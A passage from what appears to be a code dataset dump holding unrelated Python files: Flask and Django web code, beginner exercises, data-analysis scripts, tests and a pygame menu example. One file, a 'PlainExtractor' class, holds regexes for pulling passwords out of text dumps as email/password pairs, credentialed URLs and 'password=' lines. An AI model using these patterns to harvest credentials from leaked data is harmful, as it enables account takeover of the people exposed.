'POST':\n body = request.form['body']\n db = get_db()\n db.execute(\n 'UPDATE answer SET body = ?'\n ' WHERE id = ?',\n (body, id)\n )\n db.commit()\n return redirect(url_for('question.que', id=post['qid']))\n\n return render_template('question/updateanswer.html', post=post)\n\n@bp.route('//deleteanswer', methods=('POST',))\n@login_required\ndef deleteanswer(id):\n print (id)\n q = get_answer(id)\n db = get_db()\n db.execute('DELETE FROM answer WHERE id = ?', (id,))\n db.commit()\n return redirect(url_for('question.que', id=q['qid']))\n\n@bp.route('///accept_answer', methods=('GET', 'POST'))\n@login_required\ndef accept_answer(aid, qid):\n db = get_db()\n result=db.execute('select * from post where qid=? 
and author_id=?',(qid,g.user['id'])).fetchone()\n res = db.execute('select * from answer where id =?',(aid,)).fetchone()\n if result is not None and result['accepted']!=1 and res['author_id']!=g.user['id']:\n db.execute('UPDATE user SET reputation= reputation + 5 where id =?',(res['author_id'],))\n db.execute('UPDATE post SET accepted =1 where qid =?',(qid,))\n db.execute('UPDATE answer SET accepted= 1 WHERE id = ?',(aid,))\n res=db.execute('select qid from answer where id=?',(aid,)).fetchone()\n db.commit()\n return redirect(url_for('question.que',id=res['qid']))\n\n@bp.route('/about', methods=('POSTS','GET'))\ndef about():\n return render_template(\"question/about.html\")\n\n@bp.errorhandler(404)\ndef page_not_found(e):\n return render_template('auth/404.html'), 404","sub_path":"flaskr/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":17547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"8233152","text":"# Register your models here.\r\nfrom django.contrib import admin\r\nfrom django.utils.translation import ugettext_lazy as _\r\n\r\nfrom .models import (Attachment, EmailTemplate, FollowUp, KBCategory, KBItem,\r\n PreSetReply, Queue, Ticket, TicketCC, TicketChange,\r\n TicketDependency)\r\n\r\n\r\n@admin.register(Queue)\r\nclass QueueAdmin(admin.ModelAdmin):\r\n list_display = ('title', 'slug', 'email_address')\r\n prepopulated_fields = {\"slug\": (\"title\",)}\r\n\r\n@admin.register(Ticket)\r\nclass TicketAdmin(admin.ModelAdmin):\r\n list_display = ('title', 'status', 'assigned_to', 'queue', 'hidden_submitter_email',)\r\n date_hierarchy = 'created'\r\n list_filter = ('queue', 'assigned_to', 'status')\r\n\r\n def hidden_submitter_email(self, ticket):\r\n if ticket.submitter_email:\r\n username, domain = ticket.submitter_email.split(\"@\")\r\n username = username[:2] + \"*\" * (len(username) - 2)\r\n domain = domain[:1] + \"*\" * (len(domain) - 2) + domain[-1:]\r\n return \"%s@%s\" % (username, domain)\r\n else:\r\n return ticket.submitter_email\r\n hidden_submitter_email.short_description = _('Submitter E-Mail')\r\n\r\n\r\nclass TicketChangeInline(admin.StackedInline):\r\n model = TicketChange\r\n\r\nclass AttachmentInline(admin.StackedInline):\r\n model = Attachment\r\n\r\n@admin.register(FollowUp)\r\nclass FollowUpAdmin(admin.ModelAdmin):\r\n inlines = [TicketChangeInline, AttachmentInline]\r\n list_display = ('ticket_get_ticket_for_url', 'title', 'date', 'ticket', 'user', 'new_status')\r\n list_filter = ('user', 'date', 'new_status')\r\n\r\n def ticket_get_ticket_for_url(self, obj):\r\n return obj.ticket.ticket_for_url\r\n ticket_get_ticket_for_url.short_description = _('Slug')\r\n\r\n\r\n@admin.register(KBItem)\r\nclass KBItemAdmin(admin.ModelAdmin):\r\n list_display = ('category', 'title', 'last_updated',)\r\n list_display_links = ('title',)\r\n\r\n\r\n# @admin.register(CustomField)\r\n# class CustomFieldAdmin(admin.ModelAdmin):\r\n# list_display = ('name', 'label', 'data_type')\r\n\r\n\r\n@admin.register(EmailTemplate)\r\nclass EmailTemplateAdmin(admin.ModelAdmin):\r\n list_display = ('template_name', 'heading')\r\n\r\n\r\nadmin.site.register(PreSetReply)\r\nadmin.site.register(KBCategory)\r\nadmin.site.register(TicketCC)\r\nadmin.site.register(TicketDependency)\r\n","sub_path":"api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"147080512","text":"# Create a function named 
over_nine_thousand() that takes a list of numbers named lst as a parameter.\n\n# The function should sum the elements of the list until the sum is greater than 9000.\n# When this happens, the function should return the sum.\n# If the sum of all of the elements is never greater than 9000,\n# the function should return total sum of all the elements.\n# If the list is empty, the function should return 0.\n\n# For example, if lst was [8000, 900, 120, 5000], then the function should return 9020.\n\n#Write your function here\ndef over_nine_thousand(lst):\n # Create variable lst_sum\n lst_sum = 0\n # Iterate through lst\n for num in lst:\n # If lst_sum < 9000\n if (lst_sum < 9000):\n # Add num to lst_sum\n lst_sum += num\n # Else lst_sum > 9000\n else:\n # Break out of for loop\n break\n # Return lst_sum\n return lst_sum\n\n#Uncomment the line below when your function is done\nprint(over_nine_thousand([8000, 900, 120, 5000]))\n","sub_path":"Lesson 05: Loops/Lesson 02: Code Challenge: Loops/Exercise 08: Over 9000.py","file_name":"Exercise 08: Over 9000.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"608356233","text":"import csv\nimport xml.etree.ElementTree\nimport os\nfrom collections import defaultdict\n\nimport numpy as np\nfrom sklearn.preprocessing import minmax_scale\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\nlabels_images = defaultdict(list)\n@app.route(\"/\")\ndef visualise_top_images():\n return render_template('task6a.html', labels_images=labels_images)\n\n\n###########################################################################\n##GET INPUT\nCSV_folder= input(\"Enter the directory path for CSV files \")\nlabelsFile=input(\"enter image-labels file path\")\nKValue=input(\"Enter K value for KNN\")\nglobal_image_ids=[]\nLabelDict={}\nLabelled_ImagesIds=[]\nLabels=[]\n#Extract labelled images data from input file\ndef ExtractData():\n with open(labelsFile) as f:\n Qfile = f.read().splitlines()\n for line in Qfile:\n arr=line.split(\" \")\n id=int(arr[0])\n n=len(arr)-1\n label=arr[n]\n LabelDict[id]=label\n Labelled_ImagesIds.append(id)\n if label not in Labels:\n Labels.append(label)\n\nExtractData()\n##Create Matrix from file\ndef WriteFileToMatrix(filename, id_append):\n global global_image_ids\n ListOfLists=[]\n with open(CSV_folder+\"\\\\\"+filename,\"r\",) as file:\n reader = csv.reader(file)\n for row in reader:\n TemList=[]\n for element in row:\n TemList.append(float(element))\n if id_append:\n global_image_ids.append(int(TemList.pop(0)))\n ListOfLists.append(TemList)\n return ListOfLists\n\n##Get all files names\ndef GetAllFileNames():\n filenames=[]\n for filename in os.listdir(CSV_folder):\n filenames.append(filename)\n return filenames\n\n##Get all matricies of a model\ndef GetMatrixWithAllFeatures(i):\n Obj_feature_Matrix=None\n allFiles=GetAllFileNames()\n count=0\n first=True\n while(count<10):\n if(first):\n Obj_feature_Matrix=WriteFileToMatrix(allFiles[count+i],True)\n first=False\n else:\n Obj_feature_Matrix= np.hstack((Obj_feature_Matrix,WriteFileToMatrix(allFiles[count+i], False)))\n count=count+1\n return Obj_feature_Matrix\n\ndef GetMatrix():\n Matrix=[]\n first=True\n n=len(GetAllFileNames())\n i=0\n while(i 1:\n # Fixing duplicated sample names\n critical('Error: sample ' + old_sname + ' met in ' + str(len(projs_with_this_sample)) + ' projects: ' +\n ', '.join(p.project_name for 
p in projs_with_this_sample) + '.')\n            info('Sample ' + old_sname + ' met in ' + str(len(projs_with_this_sample)) + ' projects: ' +\n                 ', '.join(p.project_name for p in projs_with_this_sample) + '. Adding postfixes.')\n            for p in projs_with_this_sample:\n                for new_sample in new_samples_by_project[p]:\n                    new_sample.sample_info['description_original'] = new_sample.name\n                    new_sample.name = new_sample.sample_info['description'] + '_' + p.project_name\n                    new_sample.sample_info['description'] = new_sample.name\n        else:\n            pass  # no duplicated sample names\n\n    # Creating final dir and symlinking subdirs\n    super_project.final_dir = super_project.set_final_dir(merged_bcbio_cnf, super_project.dir, create_dir=True)\n    for bcbio_proj in bcbio_projects:\n        for old_sample, new_sample in zip(bcbio_proj.samples, new_samples_by_project[bcbio_proj]):\n            # expanding relative paths\n            for k, v in new_sample.sample_info['algorithm'].items():\n                if isinstance(v, six.string_types) and not isfile(v):\n                    full_path = abspath(join(bcbio_proj.work_dir, '..', v))\n                    if isfile(full_path):\n                        new_sample.sample_info['algorithm'][k] = full_path\n            merged_bcbio_cnf['details'].append(new_sample.sample_info)\n            new_sample.dirpath = join(super_project.final_dir, new_sample.name)\n            safe_mkdir(new_sample.dirpath)\n\n            for file_or_dir in os.listdir(old_sample.dirpath):\n                if file_or_dir not in [BcbioProject.ngs_report_dir,  # skipping clinical reports and filtered variants\n                                       BcbioProject.varfilter_dir,\n                                       BcbioProject.cnv_dir]:\n                    safe_symlink_to(join(old_sample.dirpath, file_or_dir), new_sample.dirpath)\n\n            # Ignoring CNV calls because in combine project we rerun cohort calling all samples together\n            old_cnv_dir = join(old_sample.dirpath, 'cnv')\n            if isdir(old_cnv_dir):\n                new_cnv_dir = join(new_sample.dirpath, 'cnv')\n                safe_mkdir(new_cnv_dir)\n                for file_or_dir in os.listdir(old_cnv_dir):\n                    if not file_or_dir.endswith('-' + BcbioProject.seq2c_fname):\n                        safe_symlink_to(join(old_cnv_dir, file_or_dir), new_cnv_dir)\n\n    # Write merged yaml\n    super_project.set_project_level_dirs(merged_bcbio_cnf, project_name=project_name, create_dirs=True)\n    set_up_log(super_project.log_dir, 'postproc.log')\n\n    with open(join(super_project.config_dir, 'bcbio.yaml'), 'w') as yaml_file:\n        yaml_file.write(save_yaml(merged_bcbio_cnf))\n\n    # Saving programs and versions\n    if bcbio_projects:\n        bcbio_proj = bcbio_projects[0]  # todo: verify that programs and versions identical for all projects\n        source_dir = bcbio_proj.log_dir if isdir(bcbio_proj.log_dir) else bcbio_proj.date_dir\n        for fname in os.listdir(source_dir):\n            if fname in ['programs.txt', 'data_versions.csv']:\n                safe_mkdir(super_project.log_dir)\n                shutil.copyfile(join(source_dir, fname), join(super_project.log_dir, fname))\n\n    # Merging MultiQC lists\n    comb_multiqc_dir = safe_mkdir(join(super_project.log_dir, 'multiqc_bcbio'))\n    combined_multiqc_file = join(comb_multiqc_dir, 'list_files_final.txt')\n    with open(combined_multiqc_file, 'w') as out:\n        for proj in bcbio_projects:\n            with open(find_multiqc_file_list(proj)) as list_f:\n                for l in list_f:\n                    l = l.strip()\n                    if not isfile(l):\n                        l = join(proj.final_dir, l)\n                    if isfile(l):\n                        out.write(l + '\\n')\n\n    # Symlink unfiltered vcfs\n    for proj in bcbio_projects:\n        if not proj.is_rnaseq and verify_dir(proj.raw_var_dir, silent=True):\n            safe_mkdir(super_project.raw_var_dir)\n            for fname in os.listdir(proj.raw_var_dir):\n                safe_symlink_to(join(proj.raw_var_dir, fname), super_project.raw_var_dir)\n\n    super_project.set_samples(merged_bcbio_cnf)\n\n    return 
super_project\n","sub_path":"ngs_reporting/bcbio/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":7994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"560922819","text":"# If you want to check whether only one number is perfect or not\nx = int(input(\"Enter number\"))\nsum1 = 0\nfor i in range(1,x):\n\tif x % i == 0:\n\t\tprint(i)\n\t\tsum1=sum1+i\n\nif sum1 == x:\n\tprint(x,\"is a perfect number\")\n\n# If you want to check whether multiple numbers are perfect or not.\nx = int(input(\"Enter number\"))\nfor i in range(1,x):\n\tsum2 = 0\n\tfor j in range(1,i):\n\t\tif i % j == 0:\n\t\t\tsum2 = sum2 + j\n\tif sum2 == i:\n\t\tprint(i,\"Is Perfect Number\")\n","sub_path":"basic_coding/Day1/perfect_number.py","file_name":"perfect_number.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"612454351","text":"__author__ = 'Davide Tampellini'\n__copyright__ = '2015 Davide Tampellini - FabbricaBinaria'\n__license__ = 'GNU GPL version 3 or later'\n\nimport re\nfrom lib.extractor.abstract import AbstractExtractor\n\n\nclass PlainExtractor(AbstractExtractor):\n    def __init__(self):\n        super(PlainExtractor, self).__init__()\n\n        # URL with passwords\n        self.regex['urlPwd'] = re.compile(r'[ht|f]tp[s]*://\\\w+:(.*)@\\\w*\\\.\\\w*/')\n        # Extracts data displayed in columns: Davison \tYvonne \tlibrary\n        self.regex['columns'] = re.compile(r'^[a-z0-9\\\-\\\._]+@[a-z0-9\\\-\\\.]+\\\.[a-z]{2,4}\\\s?\\\t.*?\\\t.*?\\\t(.*?)$', re.I | re.M)\n        # Standalone passwords\n        self.regex['standalone'] = re.compile(r'pass(?:word)?\\\s*?[:|=](.*?$)', re.I | re.M)\n        # email - password\n        self.regex['emailPwd'] = re.compile(r'^\"?[a-z0-9\\\-\\\._]+@[a-z0-9\\\-\\\.]+\\\.[a-z]{2,4}\\\s?[/|;|:|\\\||,|\\\t]\\\s?(.*?)[,:\\\n\"]', re.I | re.M)\n        # password email\n        self.regex['pwdEmail'] = re.compile(r'^(?!email)(?:.*?:)?(.*?)[\\\s|/|;|:|\\\||,|\\\t][a-z0-9\\\-\\\._]+@[a-z0-9\\\-\\\.]+\\\.[a-z]{2,4}\\\s*?$', re.I | re.M)\n        # username - password\n        self.regex['md5'] = re.compile(r'^(?!http)[a-z0-9\\\-]{5,15}:(.*?)$', re.I | re.M)\n\n        # Skip regexes\n        # Email address\n        self.regex['email'] = re.compile(r'[a-z0-9\\\-\\\._]+@[a-z0-9\\\-\\\.]+\\\.[a-z]{2,4}', re.I)\n        # Digits only\n        self.regex['digits'] = re.compile(r'^\\\d+$')\n\n    def analyze(self):\n        data = ''\n\n        for key, regex in self.regex.iteritems():\n            data += self.extractdata(regex) + '\\n'\n\n        self.extracted = data\n\n    def replacemateches(self, match):\n        # Let's perform some sanity checks on the matched string\n        try:\n            skip = False\n            string = match.group(1)\n            string = string.strip(' \\t\\n\\r')\n\n            # Is it too long or too short?\n            if len(string) > 20 or len(string) < 4:\n                skip = True\n\n            # Does it contain some wrong character?\n            if not skip:\n                chars = [' ', \"\\t\", \"\\n\"]\n\n                for char in chars:\n                    if char in string:\n                        skip = True\n                        break\n\n            # Is it an email address?\n            if not skip:\n                if re.match(self.regex['email'], string):\n                    skip = True\n\n            # Is this a numbers only password?\n            if not skip:\n                if re.match(self.regex['digits'], string):\n                    skip = True\n\n            # If the skip flag is not set, let's add the string to the matches\n            if not skip:\n                self.matches.append(string)\n\n        except IndexError:\n            # Do nothing, there is no match\n            pass\n\n        return ''\n","sub_path":"src/lib/extractor/plain.py","file_name":"plain.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
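The perfect-number record above recomputes the divisor sum with an O(n) inner loop per candidate. Below is a minimal standalone sketch of the O(sqrt(n)) variant; it is illustrative only, not part of any record, and is_perfect is an assumed helper name.

    # Sketch under stated assumptions: proper-divisor sum via paired divisors.
    def is_perfect(n):
        if n < 2:
            return False
        total = 1  # 1 is a proper divisor of every n > 1
        d = 2
        while d * d <= n:
            if n % d == 0:
                total += d
                if d != n // d:
                    total += n // d  # count the paired divisor n/d once
            d += 1
        return total == n

    # Usage: the first four perfect numbers are 6, 28, 496 and 8128.
    print([n for n in range(2, 10000) if is_perfect(n)])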
+{"seq_id":"291430952","text":"\"\"\"\nCreated on Wed Feb 21 10:37:33 2018\n\n@author: William Holtam\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport pylab as plt\nfrom scipy.stats import norm, probplot\nfrom matplotlib.ticker import FuncFormatter\n\nheaders = ['Date', 'Open', 'High', 'Low', 'Close', 'Adj Close', 'Volume']\ndtypes = {'Date': 'str', 'Open': 'float', 'High': 'float', 'Low': 'float', 'Close': 'float', 'Adj Close': 'float', 'Volume': 'int'}\nparse_dates = ['Date']\ndf = pd.read_csv('DNL.L.csv', \n delimiter=',', \n header=0,\n index_col=None,\n dtype=dtypes, \n parse_dates=parse_dates)\nprint(df.info())\nadj_close = df.loc[:,\"Adj Close\"]\nadj_close = adj_close.values.tolist()\n\ndaily_returns=[0]\nfor i in np.arange(1,len(adj_close)-1):\n returns = (adj_close[i]-adj_close[i-1])/adj_close[i-1]\n daily_returns.append(returns)\nplt.hist(adj_close, bins=30)\nplt.show()\n\nmu, std = norm.fit(daily_returns)\n\nprint(norm.fit(daily_returns))\nprint(mu)\nfig, axes = plt.subplots(ncols=1, sharey=True)\nfig = plt.hist(daily_returns, bins=100, density=True)\naxes.xaxis.set_major_formatter(FuncFormatter(lambda x, _: '{:.0%}'.format(x)))\nxmin,xmax = plt.xlim()\nplt.xlim(xmin,xmax)\nx = np.linspace(xmin,xmax,100)\np = norm.pdf(x,mu,std)\nplt.plot(x,p,'k',linewidth=2)\ntitle = \"Fit results: mu = %.5f, std = %.3f\" % (mu, std)\nplt.title(title)\nplt.show()\n\nprobplot(daily_returns, plot=plt)\nplt.xlim(-4,4)\nplt.ylim(-0.3,0.15)\nplt.show()\n\nfive_day_returns = [0]\nfor i in np.arange(4,len(adj_close)-1,5):\n returns = (adj_close[i]-adj_close[i-1]) / adj_close[i-1]\n five_day_returns.append(returns)\n \nfig, axes = plt.subplots(ncols=1, sharey=True)\nfig = plt.hist(five_day_returns, bins=100, density=True)\naxes.xaxis.set_major_formatter(FuncFormatter(lambda x, _: '{:.0%}'.format(x)))\nxmin,xmax = plt.xlim()\nplt.xlim(xmin,xmax)\nx = np.linspace(xmin,xmax,100)\np = norm.pdf(x,mu,std)\nplt.plot(x,p,'k',linewidth=2)\ntitle = \"Fit results: mu = %.5f, std = %.3f\" % (mu, std)\nplt.title(title)\nplt.show()\n\nprobplot(five_day_returns, plot=plt)\nplt.xlim(-4,4)\nplt.ylim(-0.3,0.15)\nplt.show()\n\nten_day_returns = [0]\nfor i in np.arange(9,len(adj_close)-1,10):\n returns = (adj_close[i]-adj_close[i-1]) / adj_close[i-1]\n ten_day_returns.append(returns)\n \nfig, axes = plt.subplots(ncols=1, sharey=True)\nfig = plt.hist(ten_day_returns, bins=100, density=True)\naxes.xaxis.set_major_formatter(FuncFormatter(lambda x, _: '{:.0%}'.format(x)))\nxmin,xmax = plt.xlim()\nplt.xlim(xmin,xmax)\nx = np.linspace(xmin,xmax,100)\np = norm.pdf(x,mu,std)\nplt.plot(x,p,'k',linewidth=2)\ntitle = \"Fit results: mu = %.5f, std = %.3f\" % (mu, std)\nplt.title(title)\nplt.show()\n\nprobplot(ten_day_returns, plot=plt)\nplt.xlim(-4,4)\nplt.ylim(-0.3,0.15)\nplt.show()\n\nk = 0\nnumber_of_days = [1,4,9]\nincrement = [1,5,10]\nincrement_label = [\"Daily Returns\", \"Five Day Returns\", \"Ten Day Returns\"]\nlist_label = [\"daily_returns\", \"five_day_returns\", \"ten_day_returns\"]\nfor j in list_label:\n j = [0]\n for i in np.arange(number_of_days[k],len(adj_close)-1,increment[k]):\n returns = (adj_close[i]-adj_close[i-1]) / adj_close[i-1]\n j.append(returns)\n \n mu, std = norm.fit(j)\n \n fig, axes = plt.subplots(ncols=1, sharey=True)\n fig = plt.hist(j, bins=100, density=True)\n axes.xaxis.set_major_formatter(FuncFormatter(lambda x, _: '{:.0%}'.format(x)))\n xmin,xmax = plt.xlim()\n plt.xlim(xmin,xmax)\n x = np.linspace(xmin,xmax,100)\n p = norm.pdf(x,mu,std)\n plt.plot(x,p,'k',linewidth=2) # This isn't 
correct but it's a start\n title = \"Fit results: mu = %.5f, std = %.3f\" % (mu, std)\n plt.title(title)\n plt.show()\n\n probplot(j, plot=plt)\n plt.title(\"Probability Plot of \" + increment_label[k])\n plt.xlim(-4,4)\n plt.ylim(-0.3,0.15)\n plt.show()\n \n k += 1\n","sub_path":"daily-returns-analysis.py","file_name":"daily-returns-analysis.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"309192812","text":"import folium\nimport pandas as pd\n\nmymap = folium.Map([50.736455, 17.666], zoom_start=4.5)\nstations = folium.FeatureGroup(\"Stations\")\n\nmetadata = pd.read_csv(\"metadata.csv\", sep=\"\\t\")\n#metadata.dropna(inplace=True)\nmetadata.drop_duplicates([\"AirQualityStationEoICode\"], inplace=True)\nmetadata.to_csv(\"pogchamp.csv\")\n\nfor index, row in metadata.iterrows():\n stations.add_child(folium.Marker(row[[\"Latitude\", \"Longitude\"]]))\n\nmymap.add_child(stations)\nmymap.save('../maps/map1.html')\n","sub_path":"scripts/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"329263306","text":"#!/usr/bin/python3\n#-*- coding:utf-8 -*-\n#Date:16-10-2017\n#Author:jhinno\n#Version=.3\n\n\nimport sys\nsys.path.append(\"..\")\nfrom tools.tools import *\nimport unittest\nimport main\n\n\n\nclass TestDesktopStart(unittest.TestCase):\n \"\"\"测试 appform 申请桌面 case:\"\"\"\n\n def setUp(self):\n print(\"开始测试appform申请桌面【desktopStart api】 ...\")\n \n\n def actions(self, arg1 , arg2, arg3, arg4 , arg5, arg6, arg7, arg8):\n\n self.url = arg7[0] + \"desktopStart?os=\" + arg1 + \"&appid=\" + arg2 + \"&resource=\" + arg3 + \"&protocol=\" + arg4 + \\\n \"&metircs_width=\" + arg5 + \"&metircs_height=\" + arg6 + \"&token=\" + arg7[1]\n self.result = Tools().access_web(self.url)\n self.data = \"期望值:\" + arg8 + \"\\n操作系统:\" + arg1 + \"\\n应用名称:\" + arg2 + \"\\n资源:\" + arg3 + \\\n \"\\n协议:\" + arg4 + \"\\n分辨率宽度:\" + arg5 + \"\\n分辨率高度:\" + arg6\n\n if arg8 == \"1\": \n self.assertEqual(self.result['result'], \"success\", msg = \"self.result['message']\")\n else:\n self.assertNotEqual(self.result['result'], \"success\", msg = \"self.result['message']\")\n\n\n @staticmethod\n def getTestFunc(arg1 , arg2, arg3, arg4 , arg5, arg6, arg7, arg8, arg9):\n def func(self):\n self.actions(arg1 , arg2, arg3, arg4 , arg5, arg6,arg7,arg8)\n return func\n\n def tearDown(self):\n print(\"【desktops api】 访问的URL地址为:\")\n print(self.url)\n print(\"【desktops api】 测试数据为:\")\n print(self.data)\n print(\"【desktops api】 测试返回值:\")\n print(self.result)\n print(\"【desktops api】 测试结束...\")\n\n\n\n\ndef generateTestCases(cases):\n arglists = []\n lenth = len(cases[0])\n for i in range(lenth):\n cas = cases[0][i]['name'] \n ext = str(cases[0][i]['expect'])\n osm = cases[0][i]['OS']\n apd = cases[0][i]['appid']\n rce = cases[0][i]['resource']\n ptl = cases[0][i]['protocol']\n mwh = cases[0][i]['metircs_width']\n mhg = cases[0][i]['metircs_height']\n arglists.append((osm, apd, rce, ptl, mwh, mhg, cases[1], str(ext), cas))\n\n for args in arglists:\n setattr(TestDesktopStart, 'test_desktopstart_{0}_{1}_{2}_{3}_{4}_{5}_{7}{7}_{8}'.format(\\\n args[0], args[1], args[2],args[3], args[4], args[5], args[6],args[7],args[8]), TestDesktopStart.getTestFunc(*args) )\n\n\ngenerateTestCases(main.get_test_data(type='desktopStart'))\n\n\n\nif __name__ == '__main__':\n\tunittest.main()\n\n","sub_path":"resapi Automated Testing 
Script/jhappform_api/test_case/test_desktopstart.py","file_name":"test_desktopstart.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"167729162","text":"from datetime import datetime, timedelta\nfrom django.utils import timezone\n\nfrom django.core.management.base import BaseCommand\nfrom django.core.mail import send_mass_mail\nfrom django.core.mail import get_connection, EmailMultiAlternatives\n\nfrom messages.models import Conversation\nfrom CoverAccounts.models import CoverMember\nfrom django.template import Context\nfrom django.template.loader import get_template\n\nclass Command(BaseCommand):\n help = 'Sends an email digest to all users with new messages.'\n\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n\n self.stdout.write('{} - Start executing Daily Email Digest command.\\nSend emails to the following users:'.format(datetime.now(timezone.utc)))\n\n messages_to_send = []\n\n email_subject = 'CACTuS - Daily update'\n email_from = 'tutoring@svcover.nl'\n\n mail_template_plain = get_template('maildigest/daily_digest.txt')\n mail_template_html = get_template('maildigest/daily_digest.html')\n\n for user in CoverMember.objects.filter(receives_daily_mails=True, is_active=True):\n\n conversations = list(Conversation.objects.conversations_of(user))\n conversations = [c for c in conversations\n if c.latest_message()\n and not user in c.latest_message().read_by.all()\n and datetime.now(timezone.utc) - c.latest_message().sent_at\n <= timedelta(hours=24)]\n\n if len(conversations) == 0:\n continue\n\n context = {\n 'user': user,\n 'conversations': conversations,\n 'n_conversations': len(conversations),\n }\n mail_content_plain = mail_template_plain.render(context)\n mail_content_html = mail_template_html.render(context)\n\n message = EmailMultiAlternatives(email_subject, mail_content_plain, email_from, [user.email])\n message.attach_alternative(mail_content_html, 'text/html')\n\n print(' - {}'.format(user))\n messages_to_send.append(message)\n\n self.stdout.write('Talking to mail server...')\n\n with get_connection() as connection:\n connection.send_messages(messages_to_send)\n\n self.stdout.write('Done! Mails successfully sent to {n} people!\\n{t} - Done.\\n---'.\n format(n=len(messages_to_send), t=datetime.now()))\n","sub_path":"web/task/management/commands/senddailydigest.py","file_name":"senddailydigest.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"558188323","text":"# coding=utf-8\n\"\"\"\npygame-menu\nhttps://github.com/ppizarror/pygame-menu\n\nEXAMPLE - MULTI-INPUT\nShows different inputs (widgets).\n\nLicense:\n-------------------------------------------------------------------------------\nThe MIT License (MIT)\nCopyright 2017-2020 Pablo Pizarro R. 
@ppizarror\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the Software\nis furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n-------------------------------------------------------------------------------\n\"\"\"\n\n# Import libraries\nimport sys\n\nsys.path.insert(0, '../../')\n\nimport os\nimport pygame\nimport pygameMenu\n\n# -----------------------------------------------------------------------------\n# Constants and global variables\n# -----------------------------------------------------------------------------\nCOLOR_BLACK = (0, 0, 0)\nCOLOR_WHITE = (255, 255, 255)\nFPS = 60.0\nMENU_BACKGROUND_COLOR = (228, 100, 36)\nTITLE_BACKGROUND_COLOR = (170, 65, 50)\nWINDOW_SIZE = (640, 480)\n\n# noinspection PyTypeChecker\nsound = None # type: pygameMenu.sound.Sound\n\n# noinspection PyTypeChecker\nsurface = None # type: pygame.Surface\n\n# noinspection PyTypeChecker\nmain_menu = None # type: pygameMenu.Menu\n\n\n# -----------------------------------------------------------------------------\n# Methods\n# -----------------------------------------------------------------------------\ndef main_background():\n \"\"\"\n Background color of the main menu, on this function user can plot\n images, play sounds, etc.\n\n :return: None\n \"\"\"\n global surface\n surface.fill((40, 40, 40))\n\n\ndef check_name_test(value):\n \"\"\"\n This function tests the text input widget.\n\n :param value: The widget value\n :type value: basestring\n :return: None\n \"\"\"\n print('User name: {0}'.format(value))\n\n\n# noinspection PyUnusedLocal\ndef update_menu_sound(value, enabled):\n \"\"\"\n Update menu sound.\n\n :param value: Value of the selector (Label and index)\n :type value: tuple\n :param enabled: Parameter of the selector, (True/False)\n :type enabled: bool\n :return: None\n \"\"\"\n global main_menu\n global sound\n if enabled:\n main_menu.set_sound(sound, recursive=True)\n print('Menu sounds were enabled')\n else:\n main_menu.set_sound(None, recursive=True)\n print('Menu sounds were disabled')\n\n\ndef main(test=False):\n \"\"\"\n Main program.\n\n :param test: Indicate function is being tested\n :type test: bool\n :return: None\n \"\"\"\n\n # -------------------------------------------------------------------------\n # Globals\n # -------------------------------------------------------------------------\n global main_menu\n global sound\n global surface\n\n # -------------------------------------------------------------------------\n # Init pygame\n # -------------------------------------------------------------------------\n pygame.init()\n os.environ['SDL_VIDEO_CENTERED'] = '1'\n\n # 
Create pygame screen and objects\n surface = pygame.display.set_mode(WINDOW_SIZE)\n pygame.display.set_caption('Example - Multi Input')\n clock = pygame.time.Clock()\n\n # -------------------------------------------------------------------------\n # Set sounds\n # -------------------------------------------------------------------------\n sound = pygameMenu.sound.Sound()\n\n # Load example sounds\n sound.load_example_sounds()\n\n # Disable a sound\n sound.set_sound(pygameMenu.sound.SOUND_TYPE_ERROR, None)\n\n # -------------------------------------------------------------------------\n # Create menus: Settings\n # -------------------------------------------------------------------------\n settings_menu = pygameMenu.Menu(font=pygameMenu.font.FONT_HELVETICA,\n menu_background_color=MENU_BACKGROUND_COLOR,\n menu_height=WINDOW_SIZE[1] * 0.85,\n menu_width=WINDOW_SIZE[0] * 0.9,\n onclose=pygameMenu.events.DISABLE_CLOSE,\n title='Settings',\n title_background_color=TITLE_BACKGROUND_COLOR,\n 